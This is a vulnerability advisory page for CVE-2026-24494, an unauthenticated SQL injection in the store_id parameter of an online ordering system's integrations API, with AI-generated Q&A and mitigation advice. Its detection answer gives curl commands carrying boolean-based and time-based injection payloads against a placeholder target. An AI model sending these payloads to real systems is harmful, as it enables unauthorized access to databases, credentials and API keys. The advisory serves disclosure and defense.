CVE-2026-24494
SQL Injection in Order Up API Allows Unauthorized Data Access
Publication date: 2026-02-23
Last updated on: 2026-02-23
Assigner: 66fe30d5-b042-4547-a192-c18da4c41a81
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| order_up | online_ordering_system | 1.0 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-89 | The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-24494 is a critical SQL Injection vulnerability found in the Order Up Online Ordering System version 1.0. It occurs in the /api/integrations/getintegrations endpoint, where the application improperly handles the user-supplied store_id parameter in a POST request.
Because the system does not perform adequate server-side validation and fails to use parameterized queries, an unauthenticated attacker can inject malicious SQL code directly into backend database queries.
Security testing confirmed this vulnerability using boolean-based and time-based blind SQL Injection techniques, allowing attackers to control query execution and extract sensitive data.
How can this vulnerability impact me? :
Exploitation of this vulnerability allows unauthenticated attackers to access and extract highly sensitive backend database information, including administrative account password hashes and critical API keys.
Attackers can enumerate database structures and gain full control over application data and administrative functions, potentially leading to data breaches, unauthorized access, and disruption of services.
Because no authentication is required to exploit this flaw, the risk and impact are very high, making it critical to address immediately.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
I don't know
How can this vulnerability be detected on my network or system? Can you suggest some commands?
[{'type': 'paragraph', 'content': 'This vulnerability can be detected by performing security testing on the /api/integrations/getintegrations endpoint using both boolean-based and time-based blind SQL Injection techniques.'}, {'type': 'paragraph', 'content': 'Boolean-based tests involve sending crafted POST requests with the store_id parameter set to SQL conditions that evaluate to true or false, and observing variations in application responses.'}, {'type': 'paragraph', 'content': 'Time-based tests involve injecting SQL statements that cause controlled delays in the server response, confirming execution of injected code even if no error messages are shown.'}, {'type': 'list_item', 'content': 'Use curl or similar tools to send POST requests to /api/integrations/getintegrations with crafted store_id parameters to test for SQL Injection.'}, {'type': 'list_item', 'content': "Example command for boolean-based test: curl -X POST -d 'store_id=1 AND 1=1' https://target/api/integrations/getintegrations"}, {'type': 'list_item', 'content': "Example command for time-based test: curl -X POST -d 'store_id=1; WAITFOR DELAY '00:00:05'' https://target/api/integrations/getintegrations"}] [1]
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include coordinating with the vendor to apply patches that fix the vulnerability.
Deploying a Web Application Firewall (WAF) can provide additional protection by filtering malicious requests targeting the vulnerable endpoint.
Long-term remediation should include implementing parameterized queries or prepared statements, enforcing strict server-side input validation, applying least-privilege principles to database access, and suppressing verbose SQL error messages.